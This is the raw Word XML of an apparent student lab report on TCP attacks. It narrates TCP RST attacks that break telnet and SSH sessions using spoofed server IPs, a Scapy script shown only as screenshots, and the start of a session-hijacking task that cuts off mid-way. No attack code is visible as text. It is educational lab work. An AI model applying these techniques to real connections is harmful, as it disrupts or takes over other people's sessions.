    <w:p w14:paraId="0C1DA1F5" w14:textId="16185CCB" w:rsidR="001254DF" w:rsidRDefault="001254DF" w:rsidP="00164485"/>
    <w:p w14:paraId="3FAC9EEE" w14:textId="00FEDDF0" w:rsidR="00B52B94" w:rsidRDefault="00B52B94" w:rsidP="00164485">
      <w:r>
        <w:t>We can see packets from the “server”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C94FEAD" w14:textId="2C2DB024" w:rsidR="00B52B94" w:rsidRDefault="00B52B94" w:rsidP="00164485">
      <w:r w:rsidRPr="00B52B94">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="772F6BB1" wp14:editId="43CD0B0C">
            <wp:extent cx="5699125" cy="7308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99125" cy="730885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CE41D" w14:textId="77777777" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="065AE94B" w14:textId="446694A6" w:rsidR="000001D6" w:rsidRDefault="000001D6" w:rsidP="00164485">
      <w:r>
        <w:t>Now we will perform TCP RST attack on the victim, by using the server’s IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E617B86" w14:textId="1A5E81DA" w:rsidR="000001D6" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r w:rsidRPr="00BA033E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36A849D5" wp14:editId="3FF3FA9A">
            <wp:extent cx="5699125" cy="457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9125" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="280319A4" w14:textId="19FB7FB9" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="605F9932" w14:textId="02182389" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r>
        <w:t>Response at the victim’s side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A6FEC" w14:textId="0B5321AA" w:rsidR="00D30D30" w:rsidRDefault="00BA033E" w:rsidP="00572796">
      <w:r w:rsidRPr="00BA033E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12B1B2DF" wp14:editId="6F21F6A1">
            <wp:extent cx="5699125" cy="6737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99125" cy="673735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="476EA2EC" w14:textId="1D201104" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>As we can see in wireshark, there was a connection between the server and the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72398B62" w14:textId="0CD38AC7" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r>
        <w:t>We are looking from the server computer and seeing packets from 10.0.2.</w:t>
      </w:r>
      <w:r w:rsidR="005A602D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="005A602D">
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:t>ictim’s IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC498D8" w14:textId="4B365D85" w:rsidR="005A602D" w:rsidRDefault="005A602D" w:rsidP="00164485">
      <w:r>
        <w:t>When we performed the TCP RST attack, the server received a packet from 10.0.2.4 (Attacker’s IP) as shown below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501FEBDE" w14:textId="0E7C2B7D" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485">
      <w:r w:rsidRPr="00BA033E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9D1C46" wp14:editId="4BA480DE">
            <wp:extent cx="5699125" cy="9607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99125" cy="960755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6D3506" w14:textId="28C5CFBB" w:rsidR="00BA033E" w:rsidRDefault="00BA033E" w:rsidP="00164485"/>
    <w:p w14:paraId="47BF03C9" w14:textId="550BB9CC" w:rsidR="003054D9" w:rsidRDefault="003054D9" w:rsidP="00164485">
      <w:r>
        <w:t>When we try to connect again, we fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE3A61E" w14:textId="505023EA" w:rsidR="003054D9" w:rsidRDefault="003054D9" w:rsidP="00164485">
      <w:r w:rsidRPr="003054D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7E9556" wp14:editId="648E00FA">
            <wp:extent cx="5699125" cy="9823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9125" cy="982345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C48241" w14:textId="77777777" w:rsidR="003054D9" w:rsidRDefault="003054D9" w:rsidP="00164485"/>
    <w:p w14:paraId="150B9432" w14:textId="1BEF7AEB" w:rsidR="00572796" w:rsidRPr="00572796" w:rsidRDefault="00572796" w:rsidP="003054D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00572796">
        <w:t>SSH Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29500919" w14:textId="1649672E" w:rsidR="00572796" w:rsidRDefault="00572796" w:rsidP="00164485">
      <w:r>
        <w:t>Creating SSH connection</w:t>
      </w:r>
      <w:r w:rsidR="00114B6D">
        <w:t xml:space="preserve"> from the victim to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D6D0C" w14:textId="07461CAE" w:rsidR="003054D9" w:rsidRDefault="00114B6D" w:rsidP="00164485">
      <w:r w:rsidRPr="00114B6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C6F84F" wp14:editId="4484590F">
            <wp:extent cx="5699125" cy="23564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99125" cy="2356485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56C0B2" w14:textId="190800DE" w:rsidR="00572796" w:rsidRDefault="00572796" w:rsidP="00164485"/>
    <w:p w14:paraId="6315FE1E" w14:textId="40ABBA9F" w:rsidR="00114B6D" w:rsidRDefault="00114B6D" w:rsidP="00164485">
      <w:r>
        <w:t>Attacking the victim, by using the server’s ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172342E7" w14:textId="394641A0" w:rsidR="00114B6D" w:rsidRDefault="00114B6D" w:rsidP="00164485">
      <w:r w:rsidRPr="00114B6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5750753C" wp14:editId="1AAF927E">
            <wp:extent cx="5699125" cy="1020111"/>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8671"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5699125" cy="1020111"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20807197" w14:textId="00153041" w:rsidR="003054D9" w:rsidRDefault="003054D9" w:rsidP="00164485"/>
    <w:p w14:paraId="47E8EC2E" w14:textId="5DECC598" w:rsidR="00114B6D" w:rsidRDefault="00114B6D" w:rsidP="00164485">
      <w:r>
        <w:t>Victim’s side, as we can see the connection was also broken in the ssh connection.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(I started writing ls, the l stayed in the same line as the message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F2330" w14:textId="52DCB03F" w:rsidR="00D804F0" w:rsidRDefault="00114B6D" w:rsidP="00D804F0">
      <w:r w:rsidRPr="00114B6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54C1F673" wp14:editId="2DF73767">
            <wp:extent cx="5699125" cy="2419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99125" cy="241935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="776238A0" w14:textId="645C5C26" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0"/>
    <w:p w14:paraId="4647F9F7" w14:textId="524D629A" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0"/>
    <w:p w14:paraId="7DCCA108" w14:textId="77777777" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0"/>
    <w:p w14:paraId="5D36C557" w14:textId="1A489C26" w:rsidR="003054D9" w:rsidRDefault="003054D9" w:rsidP="003054D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003054D9">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using Scapy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B292E" w14:textId="29CBE827" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0">
      <w:r>
        <w:t>Creating the python file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E95F8F6" w14:textId="305B2FB8" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0">
      <w:r w:rsidRPr="00D804F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A1D2E4" wp14:editId="24B82435">
            <wp:extent cx="5699125" cy="6102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99125" cy="610235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="354270A0" w14:textId="77777777" w:rsidR="003D4439" w:rsidRDefault="003D4439" w:rsidP="00D804F0"/>
    <w:p w14:paraId="25484E2F" w14:textId="7FD5F188" w:rsidR="00D804F0" w:rsidRDefault="00A424DE" w:rsidP="00D804F0">
      <w:r w:rsidRPr="00A424DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16388696" wp14:editId="34A38299">
            <wp:extent cx="5699125" cy="1083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99125" cy="1083310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FF953" w14:textId="77CEACD8" w:rsidR="00A424DE" w:rsidRDefault="00A424DE" w:rsidP="00D804F0">
      <w:r>
        <w:t>(I started with port 23 and changed to port 22 for the ssh connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9D773" w14:textId="77777777" w:rsidR="003D4439" w:rsidRPr="00D804F0" w:rsidRDefault="003D4439" w:rsidP="00D804F0"/>
    <w:p w14:paraId="6F2DA579" w14:textId="2E4AB01C" w:rsidR="00572796" w:rsidRPr="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00D804F0">
        <w:t>telnet connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF57D1" w14:textId="6FA7D9AE" w:rsidR="003054D9" w:rsidRDefault="00D804F0" w:rsidP="00164485">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creating </w:t>
      </w:r>
      <w:r w:rsidR="00C23F23">
        <w:t xml:space="preserve">a telnet </w:t>
      </w:r>
      <w:r>
        <w:t>connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B78BD26" w14:textId="7755CB23" w:rsidR="00D804F0" w:rsidRDefault="00846C60" w:rsidP="00164485">
      <w:r w:rsidRPr="00846C60">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="315F081C" wp14:editId="6AA9E2F0">
            <wp:extent cx="5699125" cy="13569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9125" cy="1356995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A277BC2" w14:textId="17C38D4F" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00164485"/>
    <w:p w14:paraId="5113F2EB" w14:textId="77777777" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00D85099">
      <w:r>
        <w:t>Attacking the victim, by using the server’s ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410BC48" w14:textId="0E9AC812" w:rsidR="00D85099" w:rsidRDefault="00FE1923" w:rsidP="00164485">
      <w:r w:rsidRPr="00FE1923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62FA191A" wp14:editId="2FA1EDFC">
            <wp:extent cx="5499383" cy="57788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99383" cy="577880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA660D4" w14:textId="42DD5B7D" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00164485"/>
    <w:p w14:paraId="55ABD2AA" w14:textId="77777777" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00D85099">
      <w:r>
        <w:t>Response at the victim’s side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410BA646" w14:textId="73E6F09E" w:rsidR="00D85099" w:rsidRDefault="00FE1923" w:rsidP="00164485">
      <w:r w:rsidRPr="00FE1923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D1E1E9" wp14:editId="6CCCACAE">
            <wp:extent cx="5699125" cy="5842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9125" cy="584200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA9D68E" w14:textId="7798FAD8" w:rsidR="00FE1923" w:rsidRDefault="00FE1923" w:rsidP="00164485"/>
    <w:p w14:paraId="42DC3B03" w14:textId="66F50417" w:rsidR="00FE1923" w:rsidRDefault="00FE1923" w:rsidP="00164485">
      <w:r>
        <w:t>Wireshark at server side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AAE3A2" w14:textId="388B91D1" w:rsidR="00FE1923" w:rsidRDefault="00FE1923" w:rsidP="00164485">
      <w:r w:rsidRPr="00FE1923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D65C43C" wp14:editId="1D0A9F9C">
            <wp:extent cx="5699125" cy="3676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99125" cy="367665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CFFB0" w14:textId="77777777" w:rsidR="00FE1923" w:rsidRDefault="00FE1923" w:rsidP="00164485"/>
    <w:p w14:paraId="4E9A28BE" w14:textId="615825D2" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00164485"/>
    <w:p w14:paraId="0DAFD14B" w14:textId="2CFCE238" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="7C7F4C1E" w14:textId="3A980991" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="75B3E474" w14:textId="11501BBF" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="49452D8D" w14:textId="7DF158C7" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="2EE7D357" w14:textId="0EA36CA0" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="2E8AFC8F" w14:textId="2507C9E6" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="36D94F20" w14:textId="49BD5EE8" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="00EED3C9" w14:textId="77777777" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="64B20AF9" w14:textId="0A836E2E" w:rsidR="00D804F0" w:rsidRDefault="00D804F0" w:rsidP="00D804F0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ssh connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381AB73A" w14:textId="6CE4AB7E" w:rsidR="00C23F23" w:rsidRDefault="00C23F23" w:rsidP="00C23F23">
      <w:r>
        <w:t>Creating a ssh connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93F597" w14:textId="56DD114F" w:rsidR="00C23F23" w:rsidRDefault="00FE1923" w:rsidP="00C23F23">
      <w:r w:rsidRPr="00FE1923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EDEA1F" wp14:editId="7C02DC22">
            <wp:extent cx="5699125" cy="2362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99125" cy="2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C68D9F4" w14:textId="77777777" w:rsidR="00FE1923" w:rsidRDefault="00FE1923" w:rsidP="00C23F23"/>
    <w:p w14:paraId="24C3E682" w14:textId="6C30389E" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00D85099">
      <w:r>
        <w:t>Attacking the victim, by using the server’s ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085B27E7" w14:textId="2C16799F" w:rsidR="00671EB3" w:rsidRPr="00671EB3" w:rsidRDefault="00671EB3" w:rsidP="00671EB3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671EB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>We changed the python code to port 22, because it is now SSH connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65807B38" w14:textId="77777777" w:rsidR="00671EB3" w:rsidRDefault="00671EB3" w:rsidP="00D85099"/>
    <w:p w14:paraId="3395FB8C" w14:textId="7544A525" w:rsidR="00671EB3" w:rsidRDefault="00671EB3" w:rsidP="00D85099">
      <w:r w:rsidRPr="00671EB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E2D8B7" wp14:editId="21A0C058">
            <wp:extent cx="5600988" cy="7112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0988" cy="711237"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="389B3964" w14:textId="77777777" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00D85099"/>
    <w:p w14:paraId="0FBD27A9" w14:textId="66A73B4F" w:rsidR="00D85099" w:rsidRDefault="00D85099" w:rsidP="00D85099">
      <w:r>
        <w:t>Victim’s side, as we can see the connection was also broken in the ssh connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F191165" w14:textId="5F05E289" w:rsidR="00D85099" w:rsidRDefault="00671EB3" w:rsidP="00C23F23">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671EB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD083B2" wp14:editId="652F8C8F">
            <wp:extent cx="5699125" cy="730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99125" cy="730250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F26A1D1" w14:textId="0D03FA13" w:rsidR="00C23F23" w:rsidRDefault="00C23F23" w:rsidP="00C23F23"/>
    <w:p w14:paraId="6C9D5F80" w14:textId="1BF24221" w:rsidR="00671EB3" w:rsidRDefault="00671EB3" w:rsidP="00C23F23">
      <w:r>
        <w:t>We can see the repeating messages at the server’s wireshark (because I did not stop the scapy code yet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D83FA" w14:textId="65958989" w:rsidR="00671EB3" w:rsidRPr="00C23F23" w:rsidRDefault="00671EB3" w:rsidP="00C23F23">
      <w:r w:rsidRPr="00671EB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CA3A05" wp14:editId="79A4AB06">
            <wp:extent cx="5699125" cy="1143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99125" cy="1143000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC5D8DE" w14:textId="77777777" w:rsidR="003054D9" w:rsidRDefault="003054D9" w:rsidP="00164485"/>
    <w:p w14:paraId="4DAC8C82" w14:textId="653F6FE7" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485"/>
    <w:p w14:paraId="4DB4DF5D" w14:textId="2EE9CE0D" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="5A928557" w14:textId="4212326C" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="4F252E94" w14:textId="6078B955" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="126ADC5B" w14:textId="289446CF" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="5B6D2C12" w14:textId="06408336" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="73F66BD5" w14:textId="4F93B394" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="705D0F80" w14:textId="3D28A06E" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="5A9F6A69" w14:textId="30C21ECE" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="22248474" w14:textId="77777777" w:rsidR="008C5E14" w:rsidRDefault="008C5E14" w:rsidP="00164485"/>
    <w:p w14:paraId="16E043BD" w14:textId="4B277106" w:rsidR="00376D00" w:rsidRDefault="00376D00" w:rsidP="00164485">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4: TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327D4A9" w14:textId="0364ADEC" w:rsidR="008C5E14" w:rsidRDefault="007E1AFE" w:rsidP="008C5E14">
      <w:r>
        <w:t>Connecting with telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870EBDC" w14:textId="59C0DA52" w:rsidR="007E1AFE" w:rsidRDefault="00B4566F" w:rsidP="008C5E14">
      <w:r w:rsidRPr="00B4566F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5684734C" wp14:editId="5E3F2443">
            <wp:extent cx="5699125" cy="2059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99125" cy="2059305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63514CFE" w14:textId="498334F4" w:rsidR="007E1AFE" w:rsidRDefault="007E1AFE" w:rsidP="008C5E14"/>
    <w:p w14:paraId="49935047" w14:textId="422C8418" w:rsidR="007E1AFE" w:rsidRDefault="00E62A1E" w:rsidP="008C5E14">
      <w:r>
        <w:t>Capturing the needed values from wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D456D3" w14:textId="6473C3A0" w:rsidR="00E62A1E" w:rsidRDefault="00B4566F" w:rsidP="008C5E14">
      <w:r w:rsidRPr="00B4566F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4824AD96" wp14:editId="316AB545">
            <wp:extent cx="5699125" cy="26073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99125" cy="2607310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BBDBAD" w14:textId="21CA0D69" w:rsidR="00F24055" w:rsidRDefault="00F24055" w:rsidP="00F24055">
      <w:r>
        <w:t>Source port – 515</w:t>
      </w:r>
      <w:r w:rsidR="00B4566F">
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (because I took the picture from the server end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A910FF" w14:textId="1EEC0BE4" w:rsidR="00F24055" w:rsidRDefault="00F24055" w:rsidP="00F24055">
      <w:r>
        <w:t>Dst port – 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF9863A" w14:textId="0CB25AD3" w:rsidR="00E62A1E" w:rsidRDefault="00E62A1E" w:rsidP="008C5E14">
      <w:r>
        <w:t xml:space="preserve">Next Sequence number – </w:t>
      </w:r>
      <w:r w:rsidR="00B4566F">
